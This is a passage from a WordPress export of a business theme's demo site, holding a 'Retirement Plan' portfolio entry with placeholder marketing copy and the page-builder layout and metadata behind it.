fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1218]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[778]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_wh]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Retirement Plan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/retirement-plan/</link>
		<pubDate>Fri, 11 Sep 2020 04:29:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=797</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>July 02, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>797</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:29:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:29:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[retirement-plan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"60e1ac27","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4c36af66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"4e2f2262","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1e19bf7","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"5fceea31","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"365148c8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"56ce4a9","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"62b7915","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7940adfb","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2711c64d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"10bfada8","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"366a5c36","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"229cd6e2","elType":"widget","settings":{"editor":"<p>July 02, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"460b2861","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3bd9565","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"1171a95e","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"671086a6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6801bcf2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"1fd021e","elType":"section","settings":[],"elements":[{"id":"7a17b9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7afe263","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6794e2c","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"439b70b","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7551f0a","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"743db68","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"32ca0e6","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5510da2","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"a3d35b8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"26f9d5a","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a990485","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1d81612","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a788fc2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"9889204","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d85079c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"25a7d8c","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d9e1c24","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"32e0c59","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e878000","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"b81500c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"652de46","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"90c5989","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4581e36","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"b73588c","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[800]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i: